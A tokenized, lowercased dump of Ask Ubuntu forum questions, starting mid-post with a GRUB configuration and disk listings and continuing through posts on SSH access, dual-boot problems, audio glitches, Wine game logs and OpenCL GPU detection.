timeout_style feature is # unavailable . else set timeout=20 fi fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi linux /boot/vmlinuz-3.13.0-29-generic root=uuid=d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ro vga=789 quiet quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-29-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ' { menuentry 'ubuntu , with linux 3.13.0-29-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-29-generic-advanced-d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi echo 'loading linux 3.13.0-29-generic ... ' linux /boot/vmlinuz-3.13.0-29-generic root=uuid=d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ro vga=789 quiet quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-29-generic } menuentry 'ubuntu , with linux 3.13.0-29-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-29-generic-recovery-d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi echo 'loading linux 3.13.0-29-generic ... ' linux /boot/vmlinuz-3.13.0-29-generic root=uuid=d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ro recovery nomodeset vga=789 quiet echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-29-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-advanced-d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ro vga=789 quiet quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-recovery-d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ro recovery nomodeset vga=789 quiet echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry 'memory test ( memtest86+ ) ' { insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi knetbsd /boot/memtest86+.elf } menuentry 'memory test ( memtest86+ , serial console 115200 ) ' { insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows recovery environment ( loader ) ( on /dev/sda2 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-7a6a69d66a698fa5 ' { insmod part_gpt insmod ntfs set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 7a6a69d66a698fa5 else search -- no-floppy -- fs-uuid -- set=root 7a6a69d66a698fa5 fi drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry 'windows 8 ( loader ) ( on /dev/sda3 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-8c88-80f7 ' { insmod part_gpt insmod fat set root='hd0 , gpt3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt3 -- hint-efi=hd0 , gpt3 -- hint-baremetal=ahci0 , gpt3 8c88-80f7 else search -- no-floppy -- fs-uuid -- set=root 8c88-80f7 fi drivemap -s ( hd0 ) $ { root } chainloader +1 } set timeout_style=menu if [ `` $ { timeout } '' = 0 ] ; then set timeout=10 fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # john @ john-sve1713y1eb : ~ $ ^c john @ john-sve1713y1eb : ~ $ ^c john @ john-sve1713y1eb : ~ $ df -h filesystem size used avail use % mounted on /dev/sda9 84g 7.1g 73g 9 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 794m 1.4m 793m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 80k 3.9g 1 % /run/shm none 100m 52k 100m 1 % /run/user /dev/sdc1 7.5g 2.2g 5.4g 29 % /media/john/dylanmusic /dev/sr0 964m 964m 0 100 % /media/john/ubuntu 14.04 lts amd64 /dev/sdb1 1.9t 892g 972g 48 % /media/john/storage main warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x4e2ccf75 device boot start end blocks id system /dev/sda1 1 1953525167 976762583+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdc : 8011 mb , 8011120640 bytes 41 heads , 41 sectors/track , 9307 cylinders , total 15646720 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdc1 8064 15646719 7819328 b w95 fat32 disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc7d968ff device boot start end blocks id system /dev/sdb1 64 3907029119 1953514528 7 hpfs/ntfs/exfat major minor # blocks name 8 0 976762584 sda 8 1 266240 sda1 8 2 1509376 sda2 8 3 266240 sda3 8 4 131072 sda4 8 5 841012780 sda5 8 6 358400 sda6 8 7 35376128 sda7 8 8 1024 sda8 8 9 89501696 sda9 8 10 8337408 sda10 11 0 987136 sr0 8 32 7823360 sdc 8 33 7819328 sdc1 8 16 1953514584 sdb 8 17 1953514528 sdb1 i am no expert on this and i 'm at a loss as how to correct this without having to re-format everything and reinstall windows 8 . however , if i 'm to try using ubuntu again then there is the risk this problem may come back . again , i did not do anything manually - the installer did everything ( with the exception of changing the boot to legacy to allow the booting of another bootloader ) . livecd works but does n't give me the options that i 've seen here and as mentioned earlier , only boot recovery only gives me the options as mentioned earlier . also this fails to load via usb ( possibly because hdd comes before usb in the boot order ? ) . being used to a windows environment , the ubuntu ( and linux ) environment is a dive at a less than comfortable depth at present ( but one i fully intend to get to grips with - especially the commands being more common via terminal ) . i very much appreciate the help with this guys .
480625	setup my ssh server , ca n't connect remotely	i installed openssh-server . i am able to ssh into the server via my ehternet local network , i can ssh from the local host . i have set up port forwarding on my router . i have run 'sudo ufw allow 22/tcp ' to ensure my port 22 is open . but everytime i try to connect remotely , i.e . ssh my_server_ip , i get the error : connect to host my_server_ip port 22 : operation timed out i have no idea how to fix this . one possible thing which i did which may have caused my server to stop working is i went into /etc/hosts changed the user name on the 2nd line which was like 127.0.1.1 user1 to 127.0.1.1 user2 , then changed it back . other than that i really have no idea . when i use a port scanning service online my port 22 is open , and i have told the router to do port forwarding to the server for port 22 .
480630	ubuntu makes my audio speaker make a `` poping sound '' back to windows in dualboot	i have a very strange problem that other people with the same hardware than me already had , but i did n't see any solutions on the internet . that 's why i 'm posting here , i 'm a bit desperate and if i do n't fix that problem i will certainly uninstall linux ... i have a dell inspiron 17r special edition with advanced audio skullcandy ( a thrid special speaker ) . everything worked fine , until i decided to install ubuntu in dual boot . when i first boot on windows everything is fine , but when i boot on linux and get back to windows , my third speaker starts to make a very strange and loud poping sound , a broken-like awful sound ... first i thought it was a hardware problem , but to make it work again , i have to totally shutdown the computer and then boot on windows ... and it works ! oo i did the test many times and i always have the same result . i fear that this speaker problem may really damage my hardware ... has someone already seen something like that ? it 's very strange that a linux installed apart creates a bug on windows ... thank you for your help , but as i said , if i do n't solve the problem , i 'll have to do a heart-breaking uninstallation of ubuntu : (
480631	how to install tascam us-322 under 14.04 lts ubuntu studio	this is my first time i ask a question here . i 've just started using ubuntu 14.04lts u , but i ca n't seem to get my sound card ( tascam us-322 ) up and running . lsusb output : bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0a5c:21b4 broadcom corp. bcm2070 bluetooth 2.1 + edr bus 002 device 007 : id 0644:8040 teac corp . bus 002 device 008 : id 0458:003a kye systems corp. ( mouse systems ) netscroll+ mini traveler / genius netscroll 120 bus 002 device 003 : id 064e : f203 suyin corp. pluging the card in and checking the output of dmesg i get this : [ 1307.763046 ] usb 2-1.1 : new high-speed usb device number 5 using ehci-pci [ 1307.850271 ] usb 2-1.1 : new usb device found , idvendor=0644 , idproduct=8040 [ 1307.850280 ] usb 2-1.1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1307.850286 ] usb 2-1.1 : product : us-322 [ 1307.850291 ] usb 2-1.1 : manufacturer : tascam [ 1307.850295 ] usb 2-1.1 : serialnumber : no serial number anyone ?
480635	mouse click firing twice	i have recently switched to xubuntu ( 14.04 ) and i have noticed that sometimes a mouse click is fired twice . e.g . i ctrl click a link and two tabs with the same content are opened in my browser . it 's not behaviour i can reproduce consistently and seems to be random ( to me ) . i also do n't know of a good way to inspect the behaviour properly for debugging purposes . i have checked the double click time setting but this does n't seem to have any impact on this . i also run xubuntu ( 13.10 ) in a vm on my macbook air and this behaviour seems to absent there . at this point in time i ca n't really tell if this is related to the distribution or the fact that it runs in a vm . any insights greatly appreciated .
480638	pipelight libraries : failure	i installed pipelight and then executed this : pipelight-plugin -- system-check the last lines of the output were : libxrender.so.1 : /usr/lib/x86_64-linux-gnu/libxrender.so.1 libxslt.so.1 : /usr/lib/x86_64-linux-gnu/libxslt.so.1 libxxf86vm.so.1 : /usr/lib/x86_64-linux-gnu/libxxf86vm.so.1 libraries : failure where do i find an explanation or a log ? whats the next step ?
480641	how to install âťhip hopâť on ubuntu 14.04	i would like to try hip hop on ubuntu 14.04 , but on the website , there is only a .tgz file , and i have no idea how to install it . there is no .deb in the compressed file . does anyone have an idea ?
480643	what have become of ubuntu jeos ? does it have a successor ?	a while ago ubuntu had a variant called `` jeos '' ( j ust e nough o perating s ystem ) . it was a minimal cd image ( .iso ) that one could use to get a minimal operating system installation , that could be further expanded via apt-get . jeos was abandoned . what 's the closest thing to it today ?
480647	os x mavericks 10.9 and ubuntu 14 dual boot	i have a macbook pro 13 '' retina display that runs os x mavericks 10.9 . i 'm planning to install the newest version of ubuntu 14 so my laptop will become dual boot . is there a good tutorial that explains the process of doing this ?
480651	command line utilities for djvu ?	there is a nice utility called pdftk for combining pdf files , extracting portions of pdf files , and other routine conversions . is there something similar that works on djvu format ?
480653	how to patch tuxlol on 14.04	i installed league of legends on ubuntu 14.04 lts . it installed and now i can play however the in game store dosent seem to work with the most recent patch . i read how do i install tuxlol on ubuntu 14.04 lts ? and did as it said however when i tried to patch it i got this error unhandled exception : system.io.filenotfoundexception : could not load file or assembly 'commandline , version=2.0.0.0 , culture=neutral , publickeytoken=de6f01bd326f8c32 ' or one of its dependencies . file name : 'commandline , version=2.0.0.0 , culture=neutral , publickeytoken=de6f01bd326f8c32' [ error ] fatal unhandled exception : system.io.filenotfoundexception : could not load file or assembly 'commandline , version=2.0.0.0 , culture=neutral , publickeytoken=de6f01bd326f8c32 ' or one of its dependencies . file name : 'commandline , version=2.0.0.0 , culture=neutral , publickeytoken=de6f01bd326f8c32' i ran the command mono tuxlol.exe patch -- dir /home/jsalex4/.playonlinux/wineprefix/leagueoflegends/drive_c/riot\ games/league\ of\ legends/ what can i do so that i can update tuxlol so i can use the in game league of legends store ?
480654	screen freezes after screen saver when watching fullscreen videos . disable screensaver when using flash	update : libflashplayer is installed on my system , firefox just isnt using it ... . i discovered this hack-sawing through my root directory with ls -r / | grep libflashplayer i want to disable the screensaver when watching videos online because when it activates and i move the mouse to escape it , my video is frozen fullscreen . everything is still running , the screen just wont update and i have to use the sysreq key to force a shutdown . im not sure about the underlying problem ( maybe i should file a bug report ? ) but i just want to prevent the screensaver as a quick fix . i found this old topic how to prevent my screen from either dimming or the screen-lock starting when watching youtube ? and wanted to comment my question there , but alas i do not have the reputation . im using ubuntu14.04 x64 with the flashplugin-installer . i would like to use the script provided in that thread ( its very simple and elegant ) but it seems libflashplayer is not what is being used by my system . in fact not a single library with flash in the name is being used , hence grep flash /proc/ $ pid/maps returns nothing . any suggestions on what library firefox might be using to render flash content ? and please do n't suggest using caffeine , it no longer supports flash and was terribly buggy anyway .
480656	when i attepmt to play outlast in playonlinux my entire machine freezes	i can run the game but cant play because when i click on the running game the mouse and keyboard stop working ( and ca n't see the game running , only listen it ) . i have to force my computer to shut down . - running wine- outlast.exe ( working directory : /home/jorge/.playonlinux/wineprefix/outlast/drive_c/games/outlast ) fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : ntdll : find_reg_tz_info ca n't find matching timezone information in the registry for bias 180 , std ( d/m/y ) : 0/00/0000 , dlt ( d/m/y ) : 0/00/0000 connection to `` provider=sqloledb ; data source=production-db ; initial catalog=enginetaskperf ; trusted_connection=yes ; connection timeout=2 '' or `` 10.1.20.20 '' failed fixme : gameux : gameexplorerimpl_verifyaccess ( 0x146e58 , l '' c : \\games\\outlast\\binaries\\win32\\olgame.exe '' , 0x203f1c8 ) fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x203f338,0x00000000 ) , stub ! fixme : d3d11 : d3d11createdevice stub : adapter 0x146de8 , driver_type d3d_driver_type_unknown , swrast ( nil ) , flags 0x1 , feature_levels 0x203f570 , levels 0x1 , sdk_version 7 , device 0x203f574 , feature_levelfixme : win : enumdisplaydevicesw ( ( null ) ,0,0x203f318,0x00000000 ) , stub ! fixme : winediag : auddrv_getaudioendpoint winepulse is not officially supported by the wine project fixme : winediag : auddrv_getaudioendpoint for sound related feedback and support , please visit http : //ubuntuforums.org/showthread.php ? t=1960599 fixme : pulse : audiosessioncontrol_registeraudiosessionnotification ( 0x1576e8 ) - > ( 0x635aacc ) - stub fixme : avrt : avsetmmthreadcharacteristicsw ( l '' audio '' ,0x779e918 ) : stub fixme : avrt : avsetmmthreadpriority ( 0x12345678 ) - > ( 1 ) stub warning , failed to load 'postprocesschain asylum_post_process.asylum_postprocess ' : failed to find object 'postprocesschain asylum_post_process.asylum_postprocess' warning , failed to load 'postprocesschain asylum_post_process.asylum_postprocess ' : failed to find object 'postprocesschain asylum_post_process.asylum_postprocess' warning , failed to load 'postprocesschain asylum_post_process.asylum_postprocess ' : failed to find object 'postprocesschain asylum_post_process.asylum_postprocess' could n't find master sound class ! this class is required for the audio sound mode system to function ! err : ole : coinitializeex attempt to change threading model of this apartment from multi-threaded to apartment threaded err : ole : coinitializeex attempt to change threading model of this apartment from multi-threaded to apartment threaded fixme : system : systemparametersinfow unimplemented action : 59 ( spi_setstickykeys ) fixme : system : systemparametersinfow unimplemented action : 53 ( spi_settogglekeys ) fixme : system : systemparametersinfow unimplemented action : 51 ( spi_setfilterkeys ) err : ole : coinitializeex attempt to change threading model of this apartment from multi-threaded to apartment threaded fixme : d3d : debug_d3dformat unrecognized 0x34324644 ( as fourcc : df24 ) wined3dformat ! fixme : d3d : wined3d_get_format ca n't find format unrecognized ( 0x34324644 ) in the format lookup table fixme : d3d9 : d3dperf_setoptions ( 0x1 ) : stub warning , failed to load 'postprocesschain asylum_post_process.asylum_postprocess ' : failed to find object 'postprocesschain asylum_post_process.asylum_postprocess' warning , failed to load 'postprocesschain asylum_post_process.asylum_postprocess ' : failed to find object 'postprocesschain asylum_post_process.asylum_postprocess' localplayer 0 - failed to setup default post process ... fixme : thread : setthreadidealprocessor ( 0x2dc ) : stub warning , failed to load 'class none . ' : failed to find object 'class none . ' warning , failed to find object 'class none . ' warning , failed to load 'class none . ' : failed to find object 'class none . ' warning , failed to find object 'class none . ' warning , failed to load 'class none . ' : failed to find object 'class none . ' warning , failed to find object 'class none . ' warning , failed to load 'class none . ' : failed to find object 'class none . ' warning , failed to find object 'class none . ' fixme : d3d : resource_check_usage unhandled usage flags 0x8 . *** warning - paths may not be valid *** err : ole : coinitializeex attempt to change threading model of this apartment from multi-threaded to apartment threaded fixme : ole : remunknown_queryinterface no interface for iid { 00000019-0000-0000-c000-000000000046 } err : ole : marshal_object could n't get ipsfactory buffer for interface { aa80e801-2021-11d2-93e0-0060b067b86e } err : ole : stdmarshalimpl_marshalinterface failed to create ifstub , hres=0x80040155 err : ole : comarshalinterface failed to marshal the interface { aa80e801-2021-11d2-93e0-0060b067b86e } , 80040155 fixme : ole : ndrclearoutparameters ( 0x203ba50,0x7e6fa920,0x203bc64 ) : stub fixme : ole : cocreateinstance no instance created for interface { aa80e801-2021-11d2-93e0-0060b067b86e } of class { 529a9e6b-6587-4f23-ab9e-9c7d683e3c50 } , hres is 0x80040155 err : ole : marshal_object could n't get ipsfactory buffer for interface { aa80e801-2021-11d2-93e0-0060b067b86e } err : ole : stdmarshalimpl_marshalinterface failed to create ifstub , hres=0x80040155 err : ole : comarshalinterface failed to marshal the interface { aa80e801-2021-11d2-93e0-0060b067b86e } , 80040155 fixme : ole : ndrclearoutparameters ( 0x203ba60,0x7e6fa920,0xb1d9fe4 ) : stub fixme : ole : cocreateinstance no instance created for interface { aa80e801-2021-11d2-93e0-0060b067b86e } of class { 529a9e6b-6587-4f23-ab9e-9c7d683e3c50 } , hres is 0x80040155 err : ole : marshal_object could n't get ipsfactory buffer for interface { 1f02b6c5-7842-4ee6-8a0b-9a24183a95ca } err : ole : stdmarshalimpl_marshalinterface failed to create ifstub , hres=0x80040155 err : ole : comarshalinterface failed to marshal the interface { 1f02b6c5-7842-4ee6-8a0b-9a24183a95ca } , 80040155 fixme : ole : ndrclearoutparameters ( 0x203b780,0x7e6fa920,0x203b9d0 ) : stub fixme : ole : cocreateinstance no instance created for interface { 1f02b6c5-7842-4ee6-8a0b-9a24183a95ca } of class { 33c53a50-f456-4884-b049-85fd643ecfed } , hres is 0x80040155 fixme : imm : immreleasecontext ( 0x30044 , 0x3acd8030 ) : stub fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . warning , failed to load 'font none.courier new ' : failed to find object 'font none.courier new' warning , failed to load 'font none.courier new ' : failed to find object 'font none.courier new' warning , failed to load 'font none.courier new ' : failed to find object 'font none.courier new' warning , failed to load 'font none.courier new ' : failed to find object 'font none.courier new' warning , failed to load 'font none.courier new ' : failed to find object 'font none.courier new' warning , failed to load 'font none.times new roman ' : failed to find object 'font none.times new roman' warning , failed to load 'font none.times new roman ' : failed to find object 'font none.times new roman' fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 .
480658	ubuntu 14.04 lts will not recognize windows 7 on boot	so just bought a new laptop , it came with windows 8 which i do n't like so i decided i wanted to make it a dual boot with windows 7 and ubuntu . first thing i did was wipe the hard drive with `` darik 's boot and nuke '' . after i created 3 primary partitions with gparted , the first 2 are of 20gb each and the third one is around 450gb . i went on to install windows 7 on the first partition and it ran with no problems . then i tried to install ubuntu 14.04 lts on the second partition , the installer did not recognize windows 7 . still i went on to install ubuntu on the second partition and also created a fourth partition for the swap . now i get the grub boot loader with only the option to run ubuntu . also i thought i would mention that the bios system that came with the laptop is `` insyde h2o bios rev 3.7 '' so moving on to what i have tried so far ... boot repair : i follow the instructions for running the program and completed the process successfully from the `` try ubuntu '' on the live usb i got for installing ubuntu . unfortunately that did not solve my problem , the url i got at the end is : http : //paste.ubuntu.com/7615229/ then i went on to creating a bootinfo summary , which is : http : //paste.ubuntu.com/7615442/ i also tried fixparts , but did n't get to far ... i got a msg from the software center saying the pkg was of low quality or something of the sort . i still tried to install it and it failed to do so . i would appreciate any suggestions in the mean time i 'll keep on looking for wanys around this . thanks ! ! *****************answer************************* so i finally got it to work ... i ended up trying to configure the grub , to do so i typed on the terminal '' gksu gedit /etc/default/grub & '' and what i got was that gksu was not in the compute , the terminal instructed me to type something like `` sudo get install gksu '' ( i do n't remember if that last command was exactly like that , all i did was copy it from the instruction the terminal gave me ) . after that i typed `` sudo update-grub '' and it said grub had found the windows 7 boot on /dev/sda . so i rebooted it and windows 7 was listed as an option on the grub boot .
480659	decrease windows partition and increase ubuntu partition data loss ?	i currently have no space left on my hard drive , but i want to increase my ubuntu partition which would also require me to decrease the size of my windows partition , but will doing this with gpart or the standard windows partition manager cause any loss of data ? if it will , is there a safe way of doing this ?
480660	resote witn aptoncd	i 'm a newbie . i use aptoncd to restore from a iso image but i ca n't . i try installing hal with command `` sudo apt-get install hal '' but i ca n't install it . please help me ! ! !
480663	ubuntu gone out of order - wont install any packages . what do i do ?	lately , i 've been getting some strange behaviour from ubuntu . first and the most important is that it wont install updates . it gives a package installation error and it simply wont work . earlier i tried to install teamviewer via the software center , but got the same package error . i also feel like the connection speed is going slower than it should - do n't know if this one is relevant to this case . what 's wrong with my installation ? how do i fix these package installation errors ?
480665	my computer wo n't boot up from the cd	it also is built by myself . it is blank . i have tried from a usb and cd , nothing seems to work . i have downloaded ubuntu live for my computer onto a blank cd .
480671	opencl application does not recognize gpu till user physically ( and not remote ) logs in to machine	i run some opencl applications on 2x amd radeon hd 7870 on a machine running ubuntu 13.10 . i power the machine on and lightdm has the login prompt . since i can not physically be present to login to the machine everytime i power cycle it . i want to troubleshoot why opencl does not detect the gpu following a power cycle on the machine . without logging in in lightdm , if i ssh into the machine and start the opencl jobs . opencl does not `` see '' the gpu . only if i login to the machine by being physically present and logging into lightdmdoes the remote shell `` see '' the gpu . i dont know much about opencl to provide more information , but this seems to be something about how ubuntu initializes . what does logging in to the lightdm console ..do to the state of the graphics driver . is there some way to `` load '' the driver to have opencl see it . strangely lsmod shows `` fglrx '' loaded and in use when opencl fails to `` see '' the gpu . # state without loggin into lightdm and as reported by a ssh session # hari @ hjubuntu : ~ $ ~/oepncl-program available device list : type : cpu , 'intel ( r ) core ( tm ) 2 quad cpu q9450 @ 2.66ghz' hari @ hjubuntu : ~ $ lsmod module size used by pci_stub 12622 1 vboxpci 23194 0 vboxnetadp 25670 0 vboxnetflt 27613 0 vboxdrv 320455 3 vboxnetadp , vboxnetflt , vboxpci cuse 13274 3 dm_crypt 22832 0 kvm_intel 138567 0 kvm 431754 1 kvm_intel gpio_ich 13476 0 ppdev 17671 0 snd_usb_audio 149162 2 bnep 19704 2 snd_usbmidi_lib 25070 1 snd_usb_audio rfcomm 69130 0 bluetooth 372041 10 bnep , rfcomm snd_hda_codec_hdmi 41154 2 microcode 23656 0 psmouse 97655 0 snd_hda_codec_realtek 56475 1 serio_raw 13413 0 snd_seq_midi 13324 0 snd_hda_intel 52267 7 snd_seq_midi_event 14899 1 snd_seq_midi snd_hda_codec 188738 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_rawmidi 30095 2 snd_usbmidi_lib , snd_seq_midi snd_hwdep 13602 2 snd_usb_audio , snd_hda_codec lpc_ich 21080 0 snd_pcm 102033 4 snd_usb_audio , snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29433 2 snd_pcm , snd_seq fglrx 8815330 48 snd 69141 31 snd_hda_codec_realtek , snd_usb_audio , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_usbmidi_lib , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi it87 43113 0 hwmon_vid 12783 1 it87 parport_pc 32701 1 coretemp 13435 0 x38_edac 12898 0 soundcore 12680 1 snd lp 17759 0 parport 42299 3 lp , ppdev , parport_pc binfmt_misc 17468 1 mac_hid 13205 0 amd_iommu_v2 19054 1 fglrx edac_core 62342 1 x38_edac vesafb 13828 1 pata_acpi 13038 0 hid_generic 12548 0 usbhid 53014 0 hid 101762 2 hid_generic , usbhid firewire_ohci 40327 0 firewire_core 64534 1 firewire_ohci crc_itu_t 12707 1 